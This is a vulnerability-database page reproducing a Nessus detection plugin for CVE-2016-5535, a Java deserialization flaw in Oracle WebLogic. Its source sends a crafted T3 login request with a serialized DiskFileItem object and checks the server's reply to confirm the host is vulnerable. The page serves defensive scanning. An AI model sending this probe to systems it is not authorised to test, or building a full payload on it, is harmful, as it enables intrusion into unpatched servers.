Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
nessusThis script is Copyright (C) 2016-2022 and is owned by Tenable, Inc. or an Affiliate thereof.WEBLOGIC_2016_5535.NASL
HistoryNov 03, 2016 - 12:00 a.m.

Oracle WebLogic Server Java Object Deserialization RCE (October 2016 CPU)

2016-11-0300:00:00
This script is Copyright (C) 2016-2022 and is owned by Tenable, Inc. or an Affiliate thereof.
www.tenable.com
931

7.5 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

0.102 Low

EPSS

Percentile

95.0%

JSON

The remote Oracle WebLogic server is affected by a remote code execution vulnerability in the WLS Security component due to unsafe deserialize calls of unauthenticated Java objects to the Apache Commons File Upload library. An unauthenticated, remote attacker can exploit this, via a crafted a DiskFileItem object, to execute arbitrary code in the context of the WebLogic server.

#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#

include('deprecated_nasl_level.inc');
include('compat.inc');

if (description)
{
  script_id(94511);
  script_version("1.12");
  script_set_attribute(attribute:"plugin_modification_date", value:"2022/04/11");

  script_cve_id("CVE-2016-5535");
  script_bugtraq_id(93692);
  script_xref(name:"TRA", value:"TRA-2016-33");
  script_xref(name:"ZDI", value:"ZDI-16-572");

  script_name(english:"Oracle WebLogic Server Java Object Deserialization RCE (October 2016 CPU)");

  script_set_attribute(attribute:"synopsis", value:
"The remote Oracle WebLogic server is affected by a remote code
execution vulnerability.");
  script_set_attribute(attribute:"description", value:
"The remote Oracle WebLogic server is affected by a remote code
execution vulnerability in the WLS Security component due to unsafe
deserialize calls of unauthenticated Java objects to the Apache
Commons File Upload library. An unauthenticated, remote attacker can
exploit this, via a crafted a DiskFileItem object, to execute
arbitrary code in the context of the WebLogic server.");
  # http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?bac902d5");
  # https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?9c6d83db");
  script_set_attribute(attribute:"see_also", value:"https://www.tenable.com/security/research/tra-2016-33");
  script_set_attribute(attribute:"see_also", value:"https://www.zerodayinitiative.com/advisories/ZDI-16-572/");
  script_set_attribute(attribute:"solution", value:
"Apply the appropriate patch according to the October 2016 Oracle
Critical Patch Update advisory.

WebLogic 12.2.1.3 is also reported to be affected. Contact Oracle
for a solution.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C");
  script_set_attribute(attribute:"cvss_score_source", value:"CVE-2016-5535");

  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"exploited_by_nessus", value:"true");

  script_set_attribute(attribute:"vuln_publication_date", value:"2016/10/18");
  script_set_attribute(attribute:"patch_publication_date", value:"2016/10/18");
  script_set_attribute(attribute:"plugin_publication_date", value:"2016/11/03");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:oracle:weblogic_server");
  script_set_attribute(attribute:"thorough_tests", value:"true");
  script_end_attributes();

  script_category(ACT_ATTACK);
  script_family(english:"Web Servers");

  script_copyright(english:"This script is Copyright (C) 2016-2022 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("weblogic_detect.nasl", "t3_detect.nasl");
  script_require_ports("Services/t3", 7001);

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("t3.inc");

appname = "Oracle WebLogic Server";

port = get_service(svc:'t3', default:7001, exit_on_fail:TRUE);

# Try to talk T3 to the server
sock = open_sock_tcp(port);
if (!sock) audit(AUDIT_SOCK_FAIL, port);
version = t3_connect(sock:sock, port:port);

# send ident so we can move on to login
t3_send_ident_request(sock:sock, port:port);

# send our "login request"
auth_request = '\x05\x65\x08\x00\x00\x00\x01\x00\x00\x00\x1b\x00\x00\x00\x5d\x01\x01\x00\x73\x72\x01\x78\x70\x73\x72\x02\x78\x70\x00\x00\x00\x00\x00\x00\x00\x00\x75\x72\x03\x78\x70\x00\x00\x00\x00\x78\x74\x00\x08\x77\x65\x62\x6c\x6f\x67\x69\x63\x75\x72\x04\x78\x70\x00\x00\x00\x0c\x9c\x97\x9a\x9a\x8c\x9a\x9b\xcf\xcf\x9b\x93\x9a\x74\x00\x08\x77\x65\x62\x6c\x6f\x67\x69\x63\x06\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x1d\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x43\x6c\x61\x73\x73\x54\x61\x62\x6c\x65\x45\x6e\x74\x72\x79\x2f\x52\x65\x81\x57\xf4\xf9\xed\x0c\x00\x00\x78\x70\x72\x00\x02\x5b\x42\xac\xf3\x17\xf8\x06\x08\x54\xe0\x02\x00\x00\x78\x70\x77\x02\x00\x00\x78\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x1d\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x43\x6c\x61\x73\x73\x54\x61\x62\x6c\x65\x45\x6e\x74\x72\x79\x2f\x52\x65\x81\x57\xf4\xf9\xed\x0c\x00\x00\x78\x70\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63\x74\x3b\x90\xce\x58\x9f\x10\x73\x29\x6c\x02\x00\x00\x78\x70\x77\x02\x00\x00\x78\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x1d\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x43\x6c\x61\x73\x73\x54\x61\x62\x6c\x65\x45\x6e\x74\x72\x79\x2f\x52\x65\x81\x57\xf4\xf9\xed\x0c\x00\x00\x78\x70\x72\x00\x10\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x56\x65\x63\x74\x6f\x72\xd9\x97\x7d\x5b\x80\x3b\xaf\x01\x03\x00\x03\x49\x00\x11\x63\x61\x70\x61\x63\x69\x74\x79\x49\x6e\x63\x72\x65\x6d\x65\x6e\x74\x49\x00\x0c\x65\x6c\x65\x6d\x65\x6e\x74\x43\x6f\x75\x6e\x74\x5b\x00\x0b\x65\x6c\x65\x6d\x65\x6e\x74\x44\x61\x74\x61\x74\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63\x74\x3b\x78\x70\x77\x02\x00\x00\x78\xfe\x01\x00\x00';
# this is an org.apache.commons.fileupload.disk.DiskFileItem object that should not
# be deserializable if the vulnerability was fixed
auth_request += '\xac\xed\x00\x05\x73\x72\x00\x2f\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x66\x69\x6c\x65\x75\x70\x6c\x6f\x61\x64\x2e\x64\x69\x73\x6b\x2e\x44\x69\x73\x6b\x46\x69\x6c\x65\x49\x74\x65\x6d\x1f\x0d\x72\x26\x83\x9a\x88\x71\x03\x00\x0a\x5a\x00\x0b\x69\x73\x46\x6f\x72\x6d\x46\x69\x65\x6c\x64\x4a\x00\x04\x73\x69\x7a\x65\x49\x00\x0d\x73\x69\x7a\x65\x54\x68\x72\x65\x73\x68\x6f\x6c\x64\x5b\x00\x0d\x63\x61\x63\x68\x65\x64\x43\x6f\x6e\x74\x65\x6e\x74\x74\x00\x02\x5b\x42\x4c\x00\x0b\x63\x6f\x6e\x74\x65\x6e\x74\x54\x79\x70\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x4c\x00\x08\x64\x66\x6f\x73\x46\x69\x6c\x65\x74\x00\x0e\x4c\x6a\x61\x76\x61\x2f\x69\x6f\x2f\x46\x69\x6c\x65\x3b\x4c\x00\x09\x66\x69\x65\x6c\x64\x4e\x61\x6d\x65\x71\x00\x7e\x00\x02\x4c\x00\x08\x66\x69\x6c\x65\x4e\x61\x6d\x65\x71\x00\x7e\x00\x02\x4c\x00\x07\x68\x65\x61\x64\x65\x72\x73\x74\x00\x2f\x4c\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x63\x6f\x6d\x6d\x6f\x6e\x73\x2f\x66\x69\x6c\x65\x75\x70\x6c\x6f\x61\x64\x2f\x46\x69\x6c\x65\x49\x74\x65\x6d\x48\x65\x61\x64\x65\x72\x73\x3b\x4c\x00\x0a\x72\x65\x70\x6f\x73\x69\x74\x6f\x72\x79\x71\x00\x7e\x00\x03\x78\x70\x00\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x00\x75\x72\x00\x02\x5b\x42\xac\xf3\x17\xf8\x06\x08\x54\xe0\x02\x00\x00\x78\x70\x00\x00\x00\x00\x74\x00\x02\x68\x69\x70\x71\x00\x7e\x00\x08\x71\x00\x7e\x00\x08\x70\x70\x78';
auth_request += '\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x25\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x49\x6d\x6d\x75\x74\x61\x62\x6c\x65\x53\x65\x72\x76\x69\x63\x65\x43\x6f\x6e\x74\x65\x78\x74\xdd\xcb\xa8\x70\x63\x86\xf0\xba\x0c\x00\x00\x78\x72\x00\x29\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6d\x69\x2e\x70\x72\x6f\x76\x69\x64\x65\x72\x2e\x42\x61\x73\x69\x63\x53\x65\x72\x76\x69\x63\x65\x43\x6f\x6e\x74\x65\x78\x74\xe4\x63\x22\x36\xc5\xd4\xa7\x1e\x0c\x00\x00\x78\x70\x77\x02\x06\x00\x73\x72\x00\x26\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6d\x69\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x4d\x65\x74\x68\x6f\x64\x44\x65\x73\x63\x72\x69\x70\x74\x6f\x72\x12\x48\x5a\x82\x8a\xf7\xf6\x7b\x0c\x00\x00\x78\x70\x77\x34\x00\x2eauthenticate\x28\x4c\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x73\x65\x63\x75\x72\x69\x74\x79\x2e\x61\x63\x6c\x2eUserInfo\x3b\x29\x00\x00\x00\x1b\x78\x78\xfe\x00\xff';
send_t3(sock:sock, data:auth_request);

# read in the response to our bad login request
return_val = recv_t3(sock:sock);
close(sock);

if (isnull(return_val) ||
  "org.apache.commons.fileupload.disk.DiskFileItem cannot be cast to weblogic.rjvm.ClassTableEntry" >!< return_val)
  audit(AUDIT_INST_VER_NOT_VULN, appname, version);

report =
  '\nNessus was able to exploit a Java deserialization vulnerability by' +
  '\nsending a crafted Java object.' +
  '\n';
security_report_v4(port:port, severity:SECURITY_HOLE, extra:report);
VendorProductVersionCPE
oracleweblogic_servercpe:/a:oracle:weblogic_server

Related

cve 1
prion 1
cvelist 1
nvd 1
zdi 1
openvas 1
nessus 1
oracle 1
cve
cve
CVE-2016-5535
2016-10-25 14:30:10
prion
prion
Design/Logic Flaw
2016-10-25 14:30:00
cvelist
cvelist
CVE-2016-5535
2016-10-25 14:00:00
nvd
nvd
CVE-2016-5535
2016-10-25 14:30:10
zdi
zdi
Oracle WebLogic Commons DiskFileItem Deserialization of Untrusted Data Remote Code Execution Vulnerability
2016-11-01 00:00:00
openvas
openvas
Oracle WebLogic Server Remote Code Execution Vulnerability (Nov 2016)
2016-11-02 00:00:00
nessus
nessus
Oracle WebLogic Server Multiple Vulnerabilities (October 2016 CPU)
2016-10-26 00:00:00
oracle
oracle
Oracle Critical Patch Update - October 2016
2016-10-18 00:00:00

7.5 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

0.102 Low

EPSS

Percentile

95.0%

JSON
Related for WEBLOGIC_2016_5535.NASL
cve1prion1cvelist1nvd1zdi1openvas1nessus1oracle1